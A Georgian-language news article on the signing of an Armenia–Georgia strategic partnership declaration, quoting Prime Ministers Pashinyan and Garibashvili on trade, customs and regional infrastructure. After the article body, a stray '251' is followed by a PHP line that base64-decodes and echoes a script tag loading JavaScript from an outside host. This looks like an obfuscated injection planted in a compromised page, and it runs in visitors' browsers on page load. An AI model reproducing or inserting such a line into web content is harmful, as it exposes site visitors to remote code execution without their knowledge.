celsiusi
ავერსი შნაიდერი

სომხეთმა და საქართველომ დღეს მიაღწიეს დიდ წინსვლას, ხელი მოვაწერეთ ერთობლივ დეკლარაციას სომხეთ-საქართველოს სტრატეგიული ურთიერთობის შესახებ, ეს ჩვენი ერთობლივი ძალისხმევის შედეგია​, – ამის შესახებ სომხეთის პრემიერ-მინისტრმა, ნიკოლ ფაშინიანმა საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილთან ერთობლივი განცხადებისას აღნიშნა.

როგორც ნიკოლ ფაშინიანმა განაცხადა, დღეს შედგა სომხეთსა და საქართველოს შორის ეკონომიკური თანამშრომლობის მთავრობათაშორისი მე-13 სხდომა.

„მადლობა მინდა, გადავუხადო ირაკლი ღარიბაშვილს, ჩვენს ქართველ კოლეგებს ამ სხდომის თბილისში მასპინძლობისა და მაღალი დონით ორგანიზებისთვის. მინდა, გულწრფელად მივულოცო საქართველოს მთავრობასა და ხალხს ევროკავშირის კანდიდატის სტატუსის მოპოვება, ამ პროცესში განსაკუთრებით ხაზს ვუსვამ როგორც ირაკლი ღარიბაშვილის ხელმძღვანელობით მთავრობის, ასევე ხალხის როლს. ეს ისტორიული მოვლენაა საქართველოსა და მთელი რეგიონისთვის. სიხარულით მინდა, ხაზი გავუსვა, რომ 2019 წლის მთავრობათშორისი კომისიის ფორმატის განახლების შემდეგ სხდომები ტარდება ყოველთვის და ხელს უწყობს კომისიის მუშაობას. დღეს ჩვენ განვიხილეთ საკითხთა ფართო სფერო, დაწყებული ეკონომიკით, დამთავრებული კულტურით, ვაჭრობით, ადამიანური ურთიერთობებით“, – განაცხადა ფაშინიანმა.

მისივე თქმით, შეხვედრაზე ისაუბრეს სამხრეთ კავკასიის ინფრასტრუქტურის გახსნაზე.

„ამ კონტექსტში უნდა აღვნიშნო, რომ ორი ქვეყნის საბაჟო ურთიერთობის მიმართულებით აქტიურად განიხილება სასაზღვრო პუნქტებზე ერთობლივი კონტროლის მოდელების დანერგვა და ამ შემთხვევაში საბაჟო პროცესებისთვის საჭირო დრო შემცირდება.

ჩვენს კოლეგებს წარვუდგინე ასევე სომხეთის რესპუბლიკის მშვიდობის გზაჯვარედინის პროექტი, რაზეც ვისაუბრე და წარმოვადგინე გასული წლის ოქტომბერში ღარიბაშვილის მოწვევით თბილისის აბრეშუმის გზის ფორუმში მონაწილეობის დროს. ეს ჩვენი პროექტი მიმართულია რეგიონის ურთიერთობების ზრდისკენ და ამ პროცესში მნიშვნელოვანია სახელმწიფოების სუვერენობის დაცვის საკითხი. ჩვენი რეგიონი შეიძლება, სამხრეთსა და ჩრდილოეთს, დასავლეთსა და აღმოსავლეთს შორის გახდეს რეგიონული ძალზედ მნიშვნელოვანი გზა და ამ ყველაფერში დიდი მნიშვნელობა ენიჭება ინკლუზიურობას. ყველა სახელმწიფოს შესაძლებლობა მიეცემა, მონაწილეობა მიიღოს ეკონომიკურ პროექტებში, ამის კარგი მაგალითია შავი ზღვის კაბელის პროექტი, რომლის მიმართ სომხეთს აქვს დიდი ინტერესი.

სომხეთმა და საქართველო დღეს მიაღწიეს დიდ წინსვლას. პრემიერთან ერთად ხელი მოვაწერეთ ერთობლივ დეკლარაციას სომხეთ-საქართველოს სტრატეგიული ურთიერთობის შესახებ, ეს ჩვენი ერთობლივი ძალისხმევის შედეგია და გამოხატავს ჩვენს მიზანმიმართულობას. ეს მიღწევა კიდევ ერთხელ უსვამს ხაზს, რომ ჩვენი ძალისხმევა უნდა გავზარდოთ და მიღწეულით არ დავკმაყოფილდეთ, რაზეც ვისაუბრეთ ასევე სხდომის დროს“, – განაცხადა ფაშინიანმა.

 როგორც საქართველოს პრემიერმა ირაკლი ღარიბაშვილმა განაცხადა, საქართველო და სომხეთი ყოველთვის იყვნენ სტრატეგიული მეგობრები, პარტნიორები და ეს რეალობა დღეს ოფიციალურად გაფორმდა.

„განსაკუთრებით მინდა, გამოვყო დღევანდელი დღის გადაწყვეტილება, რომელზეც ჩვენ ბოლო თვეების განმავლობაში ვმუშაობდით. ჯერ კიდევ ზაფხულში, გასულ წელს დავაანონსეთ, რომ ჩვენ მოვაწერდით ხელს სტრატეგიული თანამშრომლობის შესახებ მემორანდუმს. მინდა ასევე, აღვნიშნო, რომ ტრადიციულად, ისტორიულად ვართ ძალიან ძლიერი მოკავშირეები, მეგობრები, არა მხოლოდ მეზობლები. გვაქვს ძალიან კარგი პარტნიორობა, ურთიერთობა, თანამშრომლობა ყველა მიმართულებით და დე ფაქტოდ, შეიძლება ასე ითქვას, ჩვენ ისედაც ვიყავით სტრატეგიული მეგობრები და სტრატეგიული პარტნიორები. დღეს უკვე, შეიძლება, ითქვას, ეს რეალობა, მოცემულობა გაფორმდა და ხელი მოვაწერეთ ოფიციალურად სტრატეგიული პარტნიორობის შესახებ თანამშრომლობის შეთანხმებას“, – განაცხადა ღარიბაშვილმა.

251
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");